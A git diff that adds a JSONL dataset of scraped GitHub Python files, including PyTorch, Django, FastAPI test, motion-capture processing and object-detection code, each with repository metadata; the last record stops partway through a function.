diff --git "a/4034.jsonl" "b/4034.jsonl" new file mode 100644--- /dev/null +++ "b/4034.jsonl" @@ -0,0 +1,1741 @@ +{"seq_id":"7746413376","text":"# -*- coding: utf8 -*-\nfrom phystricks import *\n\ndef plasma(s):\n t=Segment(s.I,s.F)\n t.wave(0.2,0.1)\n t.parameters.color=\"blue\"\n s.parameters.color=\"red\"\n return s,t\n\ndef TOcdZDG():\n pspict,fig = SinglePicture(\"TOcdZDG\")\n pspict.dilatation(1)\n\n A=Point(1,0)\n B=Point(5,0)\n v1=Vector(1,1)\n v2=Vector(-1,3)\n tir1=Segment(A,vector=v1).dilatationF(2)\n tir2=Segment(B,vector=v2)\n\n pspict.DrawGraphs(plasma(tir1),plasma(tir2))\n pspict.DrawDefaultGrid()\n fig.conclude()\n fig.write_the_file()\n","repo_name":"LaurentClaessens/smath","sub_path":"phystricksTOcdZDG.py","file_name":"phystricksTOcdZDG.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"74710923709","text":"import torch\nimport torch.nn as nn\nfrom data.utils import mask\n\n\nclass WordDropout(nn.Module):\n def __init__(self, p, unknown=1, pad=0):\n super(WordDropout, self).__init__()\n self.p = p\n self.unknown = unknown\n self.pad = pad\n\n def forward(self, word_ids, nwords):\n if self.training:\n pad_mask = mask(nwords, device=word_ids.device)\n drop_mask = word_ids.bernoulli(self.p).to(torch.bool)\n\n word_ids = word_ids.masked_fill(drop_mask, self.unknown)\n word_ids = word_ids.masked_fill(pad_mask == 0, self.pad)\n return word_ids\n\n\nclass WordEmbedder(nn.Module):\n def __init__(self, word2idx, embed_dim, w_embeddings=None, freeze=False, word_dropout=0., init_std=0.001):\n super(WordEmbedder, self).__init__()\n\n self.word2idx = word2idx\n self.w_embed_dim = embed_dim\n self.freeze_embeddings = freeze\n self.name = \"word\"\n\n self.word_dropout = word_dropout\n self.word_drop = WordDropout(self.word_dropout)\n\n # layers\n if w_embeddings is None:\n w_embeddings = torch.zeros(len(self.word2idx), self.w_embed_dim)\n w_embeddings.normal_(mean=0.0, std=init_std)\n assert not self.freeze_embeddings\n else:\n assert w_embeddings.size(1) == self.w_embed_dim\n\n self.word_embeddings = nn.Embedding(w_embeddings.size(0), w_embeddings.size(1))\n self.word_embeddings.weight = nn.Parameter(w_embeddings)\n\n if self.freeze_embeddings:\n self.word_embeddings.weight.requires_grad = False\n\n @property\n def device(self):\n return self.word_embeddings.weight.device\n\n def forward(self, data, word_ids_k=\"word_ids\", n_words_k=\"n_words\"):\n # Word embeddings\n embeds = self.word_embeddings(\n self.word_drop(data[word_ids_k].to(self.device, non_blocking=True), data[n_words_k]))\n\n return {\"embeddings\": embeds}\n","repo_name":"btaille/sincere","sub_path":"code/modules/embedders/word.py","file_name":"word.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"60"} +{"seq_id":"8868444747","text":"#!/user/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\n 多进程\n multiprocessing模块就是跨平台版本的多进程模块\n\"\"\"\n\nimport os\n\nprint('Process (%s) start...' % os.getpid())\n# Only works on Unix/Linux/Mac:\npid = os.fork() # 调用一次返回两次 子进程永远返回0\nif pid == 0:\n print('I am 子进程 (%s) and my parent is %s.' %\n (os.getpid(), os.getppid()))\nelse:\n print('I (%s) just created a child process (%s).' 
% (os.getpid(), pid))\n","repo_name":"tinghaoMa/python","sub_path":"demo/multiprocess/01_fork.py","file_name":"01_fork.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"7252327720","text":"\"\"\"Process functions for Optitrack data.\n\nUsage Example 1:\nfrom rofunc.devices.optitrack import get_objects, data_clean\n\ninput_path = \"/path/to/optitrack/data\"\nobjs, meta = get_objects(input_path)\ndata = get_time_series(input_path, meta[0])\n\ntable_pos_x = data.iloc[:, objs[0]['table']['pose']['Position']['X']]\n\nUsage Example 2:\nfrom rofunc.devices.optitrack import get_objects, get_time_series\ndel_objects = ['cup', 'hand_right']\nobjs, meta = get_objects(input_path)\n\n# Remove unused objects from the data\nfor obj in del_objects:\n del objs[obj]\n\ndata, labels = data_clean(input_path, legacy=False, objs=objs)[0]\n\nlabel_idx = labels.index('table.pose.x')\ntable_pos_x = data[label_idx, :]\n\n\"\"\"\nimport os\nimport csv\nimport glob\n\nimport pickle as pkl\nimport pandas as pd\nfrom tqdm import tqdm\nimport numpy as np\nimport rofunc as rf\n\n\ndef get_objects(input_path: str):\n \"\"\"Returns a dictionary of objects from the Optitrack data.\n The Optitack csv must have the original name format (e.g. \"Take 2020-06-03 15-00-00.csv\").\n The returned list does not necessarily have the same order as your file explorer, but the meta ond objects list do.\\\n Check the meta to make sure you work on the correct file.\n\n Args:\n input_path (str): path to the Optitrack data.\\\n If the path is to a folder, all the file with names like \"Take[...].csv\" are read.\n Returns:\n tuple: (objects, meta)\n \"\"\"\n objs_list = list()\n meta_list = list()\n if input_path.endswith('.csv'):\n glob_path = input_path\n else:\n glob_path = os.path.join(input_path, 'Take*.csv')\n demo_csvs = glob.glob(glob_path)\n demo_csvs = sorted(demo_csvs)\n for demo_csv in demo_csvs:\n objs = {}\n demo_path = demo_csv\n with open(demo_path) as f:\n data = csv.reader(f)\n row = next(data)\n meta = dict(zip(row[::2], row[1::2]))\n next(data)\n t = next(data)\n n = next(data)\n id = next(data)\n tr = next(data)\n ax = next(data)\n\n for i, o in enumerate(n):\n o = o.lower()\n if o and o != 'name':\n if o[-7:-1] == 'marker':\n obj = o[:-8]\n m = o[-1]\n if obj not in objs:\n objs[obj] = {'markers': {}}\n if str(m) not in objs[obj]['markers']:\n objs[obj]['markers'][str(m)] = {'pose': {tr[i]: {ax[i]: i}}}\n else:\n if tr[i] not in objs[obj]['markers'][str(m)]['pose']:\n objs[obj]['markers'][str(m)]['pose'][tr[i]] = {}\n objs[obj]['markers'][str(m)]['pose'][tr[i]][ax[i]] = i\n elif not o in objs:\n objs[o] = {\n 'type': t[i],\n 'pose': {tr[i]: {ax[i]: i}},\n 'markers': {},\n 'id': {id[i]}\n }\n else:\n if tr[i] not in objs[o]['pose']:\n objs[o]['pose'][tr[i]] = {}\n objs[o]['pose'][tr[i]][ax[i]] = i\n objs_list.append(objs)\n meta_list.append(meta)\n\n return objs_list, meta_list\n\n\ndef data_clean(input_path: str, legacy: bool = True, objs: dict = None, save: bool = False):\n \"\"\"\n Cleans the Optitrack data.\n Args:\n input_path (str): path to the Optitrack data.\n legacy (:obj:`bool`, optional): if True, it will use the legacy version of the function.\\\n Defaults to True.\n objs (:obj:`dict`, optional): dictionary of objects to keep. 
If set to None, export all data.\\\n Defaults to None.\n save (:obj:`bool`, optional): if True, it will save the cleaned data to disk.\\\n Defaults to False.\n Returns:\n list: list of cleaned data for all csv in folder. Type of elements in list depend on args.\n \"\"\"\n # TODO: Must work for **file** or folder input path\n out_path = os.path.join(input_path, 'process')\n if save:\n rf.oslab.create_dir(out_path)\n demo_csvs = os.listdir(input_path)\n demo_csvs = sorted(demo_csvs)\n out_list = list()\n for i in range(len(demo_csvs)):\n demo_csv = demo_csvs[i]\n if 'Take' in demo_csv:\n if legacy:\n out_list.append(data_clean_legacy(input_path, demo_csv, out_path))\n else:\n if objs is None:\n out_data = pd.read_csv(os.path.join(input_path, demo_csv), skiprows=6)\n if save:\n out_data.to_csv(os.path.join(out_path, demo_csv))\n out_list.append(out_data)\n else:\n labels = ['frame', 'time']\n out_data = []\n data_raw = pd.read_csv(os.path.join(input_path, demo_csv), skiprows=6)\n out_data.append(data_raw.iloc[:, 0])\n out_data.append(data_raw.iloc[:, 1])\n for obj in objs:\n labels.extend([f\"{obj}.pose.x\", f\"{obj}.pose.y\", f\"{obj}.pose.z\"]),\n out_data.append(data_raw.iloc[:, objs[obj]['pose'][\"Position\"]['X']])\n out_data.append(data_raw.iloc[:, objs[obj]['pose'][\"Position\"]['Y']])\n out_data.append(data_raw.iloc[:, objs[obj]['pose'][\"Position\"]['Z']])\n if objs[obj]['type'] == 'Rigid Body':\n labels.extend([f\"{obj}.pose.qx\", f\"{obj}.pose.qy\", f\"{obj}.pose.qz\", f\"{obj}.pose.qw\"])\n out_data.append(data_raw.iloc[:, objs[obj]['pose'][\"Rotation\"]['X']])\n out_data.append(data_raw.iloc[:, objs[obj]['pose'][\"Rotation\"]['Y']])\n out_data.append(data_raw.iloc[:, objs[obj]['pose'][\"Rotation\"]['Z']])\n out_data.append(data_raw.iloc[:, objs[obj]['pose'][\"Rotation\"]['W']])\n for marker in objs[obj]['markers']:\n labels.extend(\n [f\"{obj}.marker.{marker}.x\", f\"{obj}.marker.{marker}.y\", f\"{obj}.marker.{marker}.z\"])\n out_data.append(data_raw.iloc[:, objs[obj]['markers'][marker]['pose'][\"Position\"]['X']])\n out_data.append(data_raw.iloc[:, objs[obj]['markers'][marker]['pose'][\"Position\"]['Y']])\n out_data.append(data_raw.iloc[:, objs[obj]['markers'][marker]['pose'][\"Position\"]['Z']])\n out_data = np.array(out_data).T\n out_list.append((out_data, labels))\n if save:\n with open(os.path.join(out_path, demo_csv.replace('.csv', '_labels.pkl')), 'wb') as f:\n pkl.dump(labels, f)\n np.save(os.path.join(out_path, demo_csv.replace('csv', 'npy')), out_data)\n\n print('{} finished'.format(input_path.split('/')[-1]))\n return out_list\n\n\ndef data_clean_legacy(input_path: str, demo_csv: str, out_path: str):\n \"\"\"\n Cleans the Optitrack data. 
legacy version\n Args:\n input_path (str): path to the Optitrack data.\n demo_csv (str): name of the csv file\n out_path (str): path to save the cleaned data for Manus\n\n Returns:\n csv_data (:pandas:`DataFrame`): cleaned data as a pandas dataframe\n \"\"\"\n if 'Manus' in demo_csv:\n demo_path = os.path.join(input_path, demo_csv)\n out_file_path = os.path.join(out_path, demo_csv)\n rf.oslab.delete_lines(demo_path, out_file_path, 14)\n csv_data = pd.read_csv(out_file_path)\n # csv_data = pd.read_csv(demo_path, skiprows=6)\n if '3f6ec26f' in demo_csv:\n csv_data.to_csv(os.path.join(input_path, \"left_manus.csv\"))\n elif '7b28f20b' in demo_csv:\n csv_data.to_csv(os.path.join(input_path, \"right_manus.csv\"))\n else:\n demo_path = os.path.join(input_path, demo_csv)\n # The first 6 rows are headers: https://v22.wiki.optitrack.com/index.php?title=Data_Export:_CSV\n csv_data = pd.read_csv(demo_path, skiprows=6)\n csv_data.to_csv(os.path.join(input_path, \"opti_hands.csv\"))\n\n return csv_data\n\n\ndef data_clean_batch(input_dir: str):\n demos = os.listdir(input_dir)\n demos = sorted(demos)\n for demo in tqdm(demos):\n input_path = os.path.join(input_dir, demo)\n data_clean(input_path)\n\n\ndef export(input_dir: str):\n \"\"\"\n Export rigid body motion data.\n :param input_dir: csv file path\n :return: [number of frames, number of rigid bodies, pose dimension = 7]\n \"\"\"\n csv_data = pd.read_csv(input_dir, skiprows=7, header=None)\n\n type_data = pd.read_csv(input_dir, skiprows=2, nrows=0)\n type_list = list(type_data.columns)\n\n name_data = pd.read_csv(input_dir, skiprows=3, nrows=0)\n name_list = list(name_data.columns)\n\n time_data = pd.read_csv(input_dir, skiprows=6, usecols=['Frame'])\n time_data_list = list(time_data.index)\n\n rigid_body_index_list = []\n for i in range(len(type_list)):\n if (\":Marker\" not in name_list[i]) and (\"Rigid Body\" in type_list[i]):\n rigid_body_index_list.append(i)\n\n num_rigid_body = int(len(rigid_body_index_list) / 7)\n optitrack_data_list = []\n\n for i in time_data_list:\n frame_data = []\n for j in range(num_rigid_body):\n rigid_body_index_start = 7 * j\n rigid_body_index_end = 7 + 7 * j\n frame_data.append(\n list(csv_data.values[i, rigid_body_index_list[rigid_body_index_start:rigid_body_index_end]]))\n optitrack_data_list.append(frame_data)\n return np.array(optitrack_data_list)\n","repo_name":"Skylark0924/Rofunc","sub_path":"rofunc/devices/optitrack/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":9969,"program_lang":"python","lang":"en","doc_type":"code","stars":218,"dataset":"github-code","pt":"60"} +{"seq_id":"73067826750","text":"#!/usr/bin/env python3\n#-*- coding: UTF-8 -*-\nimport random\nimport collections\nimport copy\nimport numpy as np\n\nimport student\n\nROW_MAX = 6\nCOLUMN_MAX = 7\n\n\nclass SeatTable(object):\n def __init__(self, students, mating_pair=None):\n self.mating_pair = mating_pair\n self.students = students\n\n if self.mating_pair: self.init_by_mating()\n else: self.init_by_random()\n\n self.score = self.calc_score()\n\n\n def init_by_mating(self):\n st_nums = copy.deepcopy(list(self.students.keys()))\n self.table = np.zeros((ROW_MAX, COLUMN_MAX), dtype='int32')\n rows, cols = self.table.shape\n locations = [(r,c) for r in range(rows) for c in range(cols)]\n a = self.mating_pair[0]\n b = self.mating_pair[1]\n\n # copy the same gene(seat location)\n for r, c in locations:\n if a.table[r, c] == b.table[r, c]:\n st_num = a.table[r, c]\n if st_num != 0:\n st_nums.remove(st_num)\n 
locations.remove((r,c))\n self.table[r,c] = st_num\n\n while st_nums:\n st_num = random.choice(st_nums) # random choice student\n st_nums.remove(st_num)\n loc = random.choice(locations) # random choice location\n locations.remove(loc)\n\n r, c = loc[0], loc[1]\n self.table[r,c] = st_num\n\n self.mutation()\n\n\n def init_by_random(self):\n st_nums = copy.deepcopy(list(self.students.keys()))\n self.table = np.zeros((ROW_MAX, COLUMN_MAX), dtype='int32')\n rows, cols = self.table.shape\n locations = [(r,c) for r in range(rows) for c in range(cols)]\n\n while st_nums:\n st_num = random.choice(st_nums) # random choice student\n st_nums.remove(st_num)\n loc = random.choice(locations) # random choice location\n locations.remove(loc)\n\n r, c = loc[0], loc[1]\n self.table[r,c] = st_num\n\n\n def mutation(self):\n while random.random() < 0.6:\n rows, cols = self.table.shape\n locations = [(r,c) for r in range(rows) for c in range(cols)]\n\n # random selcect 2 locations\n loc1 = random.choice(locations)\n loc2 = loc1\n while loc2 == loc1: \n loc2 = random.choice(locations)\n \n # swap\n r1, c1 = loc1[0], loc1[1]\n r2, c2 = loc2[0], loc2[1]\n tmp = self.table[r1, c1]\n self.table[r1, c1] = self.table[r2, c2]\n self.table[r2, c2] = tmp\n\n\n def calc_score(self):\n hscore = self.height_score()\n return hscore\n\n\n def height_score(self):\n result = 0\n tt = self.table.transpose()\n for col in tt:\n height_score = self.col_height_score(col)\n result += height_score\n return result\n\n\n def col_height_score(self, col):\n result = 0\n for idx, sn in enumerate(col):\n if sn == 0: continue # empty seat\n st = self.students[sn]\n h = st.height\n\n for sn2 in col[:idx]:\n if sn2 == 0: continue # empty seat\n if sn2 != sn:\n front_st = self.students[sn2]\n front_h = front_st.height\n diff = (front_h - h) if front_h > h else 0\n result += diff \n return result\n\n\n def __repr__(self):\n lines = []\n rows, cols = self.table.shape\n for r in range(rows):\n st_infos = []\n for c in range(cols):\n sn = self.table[r, c]\n if sn:\n st = self.students[sn]\n info = '#{:02d},{:03d},{}'.format(st.num, st.height, st.duty)\n st_infos.append(info)\n else:\n st_infos.append('#--,---,-')\n line = ' '.join(st_infos)\n lines.append(line)\n\n line = 'score: {}'.format(self.calc_score())\n lines.append(line)\n\n result = '\\n'.join(lines)\n return result\n\n\n def __str__(self):\n return str(self.table)\n\n\nif __name__ == '__main__':\n students = student.student_factory('config.txt')\n\n for _ in range(3):\n table = SeatTable(students)\n print(table)\n print(repr(table))\n\n\n","repo_name":"handy505/seat_tables","sub_path":"seat.py","file_name":"seat.py","file_ext":"py","file_size_in_byte":4375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"44088566240","text":"from django.shortcuts import render, get_object_or_404,redirect\nfrom .models import Comment \nfrom newss.models import News \nfrom cat.models import Cat \nfrom subcat.models import SubCat \nfrom django.contrib.auth import authenticate,login,logout\nfrom django.core.files.storage import FileSystemStorage \nfrom trending.models import Trending \nimport random\nfrom random import randint \nfrom django.contrib.auth.models import User, Group, Permission\nfrom manager.models import Manager \nimport string \nimport datetime \n\n\n# Create your views here.\n\ndef news_cm_add(request,pk):\n if request.method == 'POST':\n now = datetime.datetime.now()#hozirgi vaqtni oladi \n year = now.year #hozirgi vaqtdan faqat 
yilini olsin\n month = now.month #hozirgi vaqtdan faqat oyni olsin\n day = now.day #hozirgi vaqtdan kunini olsin , seshanba\n\n if len(str(day)) == 1:#agar uzunligi 1 taga teng bo'lsa, 5-kun 0 + 5 05 kun \n day = \"0\"+str(day)\n if len(str(month)) == 1:#uzunligi 1 ga teng bo'lsa \n month = \"0\" + str(month)#01 yanvar 02 fevral \n today = str(year) + \"/\" + str(month)+\"/\" + str(day)#kunini oldi to'liq 2022 12 12\n time = str(now.hour) + \":\" + str(now.minute)#15:15 \n cm = request.POST.get('msg')\n if request.user.is_authenticated:#user logged in \n manager = Manager.objects.get(utxt=request.user)\n b = Comment(name=manager.name,email=manager.email,cm=cm,news_id=pk,date=today,time=tiem)#name = manager.name means will take automatically from loggerd in user(manager) - manager.name managerni ismini ob qo'yishi kerak, qachonki u login qilgan paytda, \n b.save()\n else:#user not logged in \n name = request.POST.get('name')\n email = request.POST.get('email')\n b = Comment(name=name,email=email,cm=cm,news_id=pk,date=today,time=time)\n b.save()\n newsname = News.objects.get(pk=pk).name #ya'ni pk = primary key asosiy kalit, models ni kaliti \n return redirect('news_detail',word=newsname)\n\ndef comments_list(request):\n #login qilish kerak, admin\n if not request.user.is_authenticated:\n return redirect('mylogin')\n perm = 0 \n for i in request.user.groups.all():#foydalanuvchi guruhlari ichida yurilik\n if i.name == \"masteruser\":perm=1 #bu superuser \n if perm == 0:#user superuser emas masteruser\n a = News.objects.get(pk=pk).writer\n if str(a) != str(request.user):#we can use a instead of str(a). it will not give error \n error = \"Access Denied\"\n return render(request,'back/error.html',{'error':error})\n comment = Comment.objects.all()\n return render(request,'back/comments_list.html',{'comment':comment})\n\ndef comments_del(request,pk):\n if not request.user.is_authenticated:\n return redirect('mylogin')\n perm = 0 \n for i in request.user.groups.all():\n if i.name == \"masteruser\":perm = 1 \n if perm == 0:\n a = News.objects.get(pk=pk).writer\n if str(a) != str(request.user):\n error = \"Access Denied\"\n return render(request,'back/error.html',{'error':error})\n comment = Comment.objects.filter(pk=pk)\n comment.delete()\n return redirect('comments_list')\n\ndef comments_confirm(request,pk):\n if not request.user.is_authenticated:\n return redirect('mylogin')\n perm = 0 \n for i in request.user.groups.all():\n if i.name == \"masteruser\":perm = 1 \n if perm == 0:\n a = News.objects.get(pk=pk).writer\n if str(a) != str(request.user):\n error = \"Access Denied\"\n return render(request,'back/error.html',{'error':error})\n comment = Comment.objects.get(pk=pk)\n comment.status = 1 \n comment.save()\n return redirect('comments_list')\n\n\n\n","repo_name":"SDeVPro/news_portal_for_students","sub_path":"comment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"15419148796","text":"from apps.login.models import Acount\nfrom apps.agenda.models import Turn\nfrom apps.agenda.forms import SearchForm\n\ndef valid_acount(request):\n if request.user.is_authenticated:\n try:\n user = Acount.objects.get(user_id=request.user) # Suponiendo que tienes una relación OneToOneField llamada 'acount' en tu modelo User\n except Acount.DoesNotExist:\n return False\n else:\n return False\n return True\n\ndef search_turn(request):\n form = SearchForm(request.GET)\n turns = 
Turn.objects.all()\n\n if form.is_valid():\n day_of_week = form.cleaned_data['day_of_week']\n date = form.cleaned_data['date']\n\n if day_of_week:\n turns = turns.filter(date__week_day=SearchForm.day_choices.index(day_of_week))\n\n if date:\n turns = turns.filter(date=date)\n\n return turns\n","repo_name":"Stradivariuskein/tercer-pre-entrega-luque","sub_path":"pamela/my_functions.py","file_name":"my_functions.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29526044107","text":"from django.db import models\n#from multiselectfield import MultiSelectField\n\nDOW = (('1', 'Sunday'),\n ('2', 'Monday'),\n ('3', 'Tuesday'),\n ('4', 'Wednesday'),\n ('5', 'Thursday'),\n ('6', 'Friday'),\n ('7', 'Saturday'))\n\nFrequency = (('1', 'Weekly'),\n ('2', 'Monthly'),\n ('3', 'Bi-Weekly'),\n ('4', 'Bi-Monthly'))\n\nclass Course(models.Model):\n course_name = models.CharField(blank=False, null=False, max_length=250)\n course_slug = models.SlugField(unique=True)\n course_description = models.TextField(blank=False, null=False)\n course_start_time = models.TimeField(blank=False, null=False)\n course_end_time = models.TimeField(blank=False, null=False)\n #course_days_of_week = MultiSelectField(choices=DOW)\n course_days_of_week = models.CharField(max_length=1, choices=DOW)\n course_all_day = models.BooleanField(default=False)\n custom_start_date = models.DateField(blank=True, null=True)\n custom_end_date = models.DateField(blank=True, null=True)\n session_id = models.ForeignKey('Session')\n course_private = models.BooleanField(default=False)\n course_spaces = models.IntegerField(default=15)\n course_date_created = models.DateTimeField(blank=True, null=False, auto_now=True)\n course_date_modified = models.DateTimeField(blank=True, null=False, auto_now=True)\n course_instructor = models.ForeignKey('users.User')\n #course_image\n course_price = models.IntegerField(blank=True, null=True)\n location_id = models.ForeignKey('Location')\n course_category_id = models.ForeignKey('Category')\n recurs = models.BooleanField(default=True)\n recurs_interval = models.CharField(max_length=1, choices=Frequency, default=1)\n custom_recurs_times = models.IntegerField(blank=True, null=True)\n #will use the recurs info to build calendar feed\n\n class Meta:\n db_table = 'cm_courses'\n\n def __str__(self):\n return self.course_name\n\nclass CourseImage(models.Model):\n course_image = models.ImageField()\n\n def _str__(self):\n return self.courseimage_id\n\nclass Session(models.Model):\n session_name = models.CharField(blank=False, null=False, max_length=250)\n session_start_date = models.DateField(blank=False, null=False)\n session_end_date = models.DateField(blank=False, null=False)\n\n def __str__(self):\n return self.session_name\n\nclass Location(models.Model):\n location_name = models.CharField(blank=False, null=False, max_length=250)\n location_slug = models.CharField(max_length=100, blank=False, null=False)\n location_address = models.CharField(max_length=200, blank=False, null=False)\n location_address2 = models.CharField(max_length=200, blank=True, null=True)\n location_city = models.CharField(max_length=200, blank=False, null=False)\n location_state = models.CharField(max_length=2, blank=False, null=False)\n location_postcode = models.CharField(max_length=10, blank=False, null=False)\n location_phone = models.CharField(max_length=15, blank=True, null=True)\n #google maps linkage\n #location_country = 
models.CharField(max_length=2, blank=True, null=True)\n\n class Meta:\n db_table = 'cm_locations'\n\n def __str__(self):\n return self.location_name\n\nclass Category(models.Model):\n category_name = models.CharField(blank=False, null=False, max_length=250)\n category_slug = models.CharField(max_length=100, blank=False, null=False)\n\n class Meta:\n db_table = 'cm_categories'\n verbose_name_plural = \"categories\"\n\n def __str__(self):\n return self.category_name\n\nclass Spot(models.Model):\n #the purchasable thing isn't the course, it's a spot in the course\n course_slug = models.ForeignKey('Course')\n spot_name = models.CharField(max_length=100, blank=False, null=False)\n spot_price = models.DecimalField(max_digits=14, decimal_places=4, blank=True, null=True)\n spot_start = models.DateTimeField(blank=True, null=True) #spots go on sale\n spot_end = models.DateTimeField(blank=True, null=True) #sales end\n spot_quantity = models.IntegerField(blank=False, null=False, default=1)\n\n class Meta:\n db_table = 'cm_spots'\n","repo_name":"mattyarbrough/coursemanager","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"40014437423","text":"import os\nimport pickle\nimport torch\n\n\nSPECIAL_WORDS = {'PADDING': ''}\n\n\ndef load_data(path):\n \"\"\"\n Load Dataset from File\n \"\"\"\n input_file = os.path.join(path)\n with open(input_file, \"r\") as f:\n data = f.read()\n\n return data\n\n\ndef preprocess_and_save_data(dataset_path, token_lookup, create_lookup_tables):\n \"\"\"\n Preprocess Text Data\n \"\"\"\n text = load_data(dataset_path)\n \n # Ignore notice, since we don't use it for analysing the data\n text = text[81:]\n\n token_dict = token_lookup()\n for key, token in token_dict.items():\n text = text.replace(key, ' {} '.format(token))\n\n text = text.lower()\n text = text.split()\n\n vocab_to_int, int_to_vocab = create_lookup_tables(text + list(SPECIAL_WORDS.values()))\n int_text = [vocab_to_int[word] for word in text]\n pickle.dump((int_text, vocab_to_int, int_to_vocab, token_dict), open('preprocess.p', 'wb'))\n\n\ndef load_preprocess():\n \"\"\"\n Load the Preprocessed Training data and return them in batches of or less\n \"\"\"\n return pickle.load(open('preprocess.p', mode='rb'))\n\n\ndef save_model(filename, decoder):\n save_filename = os.path.splitext(os.path.basename(filename))[0] + '.pt'\n torch.save(decoder, save_filename)\n\n\ndef load_model(filename):\n save_filename = os.path.splitext(os.path.basename(filename))[0] + '.pt'\n return torch.load(save_filename)\n","repo_name":"udacity/deep-learning-v2-pytorch","sub_path":"project-tv-script-generation/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":5070,"dataset":"github-code","pt":"60"} +{"seq_id":"28114593037","text":"from fastapi.testclient import TestClient\r\nfrom app.app import app\r\nimport pytest\r\nfrom sqlalchemy import create_engine\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\nfrom sqlalchemy.orm import sessionmaker\r\nfrom app.db.database import get_db,Base\r\nfrom app.db.models.entries_model import Entries\r\nimport os\r\nfrom dotenv import 
load_dotenv\r\nload_dotenv()\r\n\r\n\r\ndatabase_url_test=os.getenv('database_url_test')\r\n\r\nengine=create_engine(database_url_test)\r\n\r\nTestingSessionLocal=sessionmaker(bind=engine,autocommit=False,autoflush=False,expire_on_commit=False)\r\n\r\n\r\n\r\n@pytest.fixture()\r\ndef session():\r\n TestingSessionLocal.close_all()\r\n Base.metadata.drop_all(bind=engine)\r\n Base.metadata.create_all(bind=engine)\r\n db=TestingSessionLocal()\r\n try:\r\n yield db\r\n except:\r\n db.close()\r\n\r\n\r\n\r\n@pytest.fixture()\r\ndef client(session):\r\n\r\n def override_get_db():\r\n try:\r\n yield session\r\n except:\r\n session.close()\r\n app.dependency_overrides[get_db]=override_get_db \r\n yield TestClient(app)\r\n \r\n\r\n@pytest.fixture\r\ndef new_user(client):\r\n data={\"username\":\"test_user\",\"email\":\"test_user@gmail.com\",\"password\":\"test_user_password\"}\r\n res=client.post('/users/register',json=data)\r\n \r\n new_user= res.json()\r\n new_user['password']=data['password']\r\n \r\n return new_user\r\n\r\n@pytest.fixture\r\ndef authorized_client(new_user,client):\r\n client.headers={\r\n **client.headers,\r\n \"Authorization\":f\"Bearer {new_user['token']['access_token']}\"\r\n }\r\n\r\n return client \r\n\r\n@pytest.fixture\r\ndef test_entries(new_user,session):\r\n entries_data=[\r\n {\r\n 'title':'1st title',\r\n 'body':'1st content',\r\n 'user_id':new_user['id']\r\n },\r\n {\r\n 'title':'2nd title',\r\n 'body':'2nd content',\r\n 'user_id':new_user['id']\r\n },\r\n {\r\n 'title':'3rd title',\r\n 'body':'3rd content',\r\n 'user_id':new_user['id']\r\n },\r\n ]\r\n def create_entries_data(entry):\r\n return Entries(**entry)\r\n\r\n entries_map=map(create_entries_data,entries_data)\r\n entries=list(entries_map)\r\n session.add_all(entries)\r\n session.commit()\r\n data=session.query(Entries).filter(Entries.user_id==new_user['id']).all()\r\n return data\r\n\r\n","repo_name":"vicorandy/python_diary_app","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"14364988835","text":"\"\"\"\nThis module provides code to run SSD Object Detection on the given folder\nof images and save the prediction in voc format to results/detection-results.\nTiming information for both code execution and inference time is also \nrecorded to a CSV file \"results/time-results.csv\".\n\ndetection-results can then be passed to the mapscore library to generate a\nmAP score for these detections against the ground truth values for the data.\n\n\nAuthor: David Temple\nDate: 02/03/2020\n\"\"\"\n# OpenCV module installed from https://github.com/opencv/opencv\nimport cv2\n\n# numpy module installed via pip https://numpy.org\nimport numpy as np\n\n# Python standard library modules\nimport argparse\nimport os\nimport csv\nimport shutil\nimport time\n\n#  Command line arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\n \"-c\", \"--conf\", default=0.5, type=float, help=\"Set the detection threshold\"\n)\nparser.add_argument(\n \"-d\",\n \"--data\",\n default=\"../test_images/coco_test/images/\",\n help=\"relative path of dataset to use\",\n)\nparser.add_argument(\n \"-s\", \"--samples\", default=None, type=int, help=\"number of images to test on\",\n)\nparser.add_argument(\n \"-g\", \"--gpu\", default=False, type=bool, help=\"boolean to toggle the use of gpu\"\n)\nargs = parser.parse_args()\n\n# Compatible networks\nMODEL = 
\"MobileNetSSD_V2.pb\"\nINPUT_DIMENSIONS = 300\n\n# Load class labels for relavant file.\n# Based on https://pysource.com/2019/06/27/yolo-object-detection-using-opencv-with-python/\nclasses = []\nwith open(\"coco.names\", \"r\") as f:\n classes = [line.strip() for line in f.readlines()]\n\n# Select dataset\nimages_path = args.data if args.data[-1] == \"/\" else args.data + \"/\"\n# List of all images for testing\nimages_list = os.listdir(images_path)\n# Order images in ascending order if possible\nimages_list = sorted(\n images_list,\n key=lambda x: int(x.replace(\".jpg\", \"\"))\n if x.replace(\".jpg\", \"\").isnumeric()\n else 1,\n)\n\nif args.samples is None or args.samples >= len(images_list):\n print(f\"max number of samples is {len(images_list)}\")\n args.samples = len(images_list)\n\n# Directories for results\ndetection_results = \"results/detection-results\"\ntime_results = \"results/time-results.csv\"\n\n# Remove any exisiting results files to prevent overlap\nif os.path.exists(detection_results):\n shutil.rmtree(detection_results)\nif os.path.exists(time_results):\n os.remove(time_results)\n\nos.makedirs(detection_results)\n\n\ndef add_bb_info(path, line):\n # Store bounding box information for mAP score\n with open(path, \"a\") as file:\n 